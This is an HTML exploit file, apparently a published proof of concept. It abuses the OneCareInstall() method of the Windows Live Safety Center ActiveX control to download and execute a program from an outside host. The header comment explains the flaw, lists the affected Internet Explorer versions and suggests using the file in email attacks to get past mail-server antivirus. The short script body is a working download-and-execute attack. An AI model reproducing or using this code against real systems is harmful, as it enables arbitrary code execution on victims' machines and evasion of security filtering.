<!--
onecare_exploit.html

Microsoft Windows Live Safety Scanner (OneCare) Local Download and Execute Exploit

Description:
A vulnerability has been found in Microsoft Windows Live Safety Center (OneCare) which allows an attacker to download and 
execute files (executables) to a victim machine.
User interaction is required to exploit this vulnerability. A user must open a local HTML file which initializes the Windows Live 
Safety Center ActiveX control (wlscCore.dll) and abuse the OneCareInstall() property to download and execute a file.
This vulnerability can only be exploited locally due to the safe for initialization and safe for scripting settings of the vulnerable 
ActiveX control, which are both set to False. This means exploitation is possible only from Local Machine Zone.
This vulnerability can be useful in various scenarios. For example, in a scenario when attacking a user via email, in the 
presence of an anti-virus system on the mail server which drops malicious content (such as executables), this exploit can 
come handy.

File: C:\Program Files\Windows Live Safety Center\wlscCore.dll
GUID: 55265A35-B335-44FE-BFB4-854E3461004D
Version: 1.12.6087.1
Safe for Script: False
Safe for Init: False
KillBitSet: False
Site: http://onecare.live.com/site/en-us/default.htm

Successfully exploited on the following platforms:
 - Internet Explorer 6, Windows XP SP2
 - Internet Explorer 7, Windows XP SP3
 - Internet Explorer 8, Windows XP SP3
 
Credit:
Trancer of Recognize-Security (www.rec-sec.com)
http://www.rec-sec.com/2010/09/21/windows-live-onecare-local-exploit/

-->
<html>
<head>
<title>Microsoft Windows Live Safety Scanner (OneCare) Local Download and Execute Exploit</title>
</head>
<body>
<object classid='clsid:55265A35-B335-44FE-BFB4-854E3461004D' id='onecare'></object>
<script>
var url = 'http://www.rec-sec.com/x/calc.exe';
onecare.OneCareInstall(url);
</script>
</body>
</html>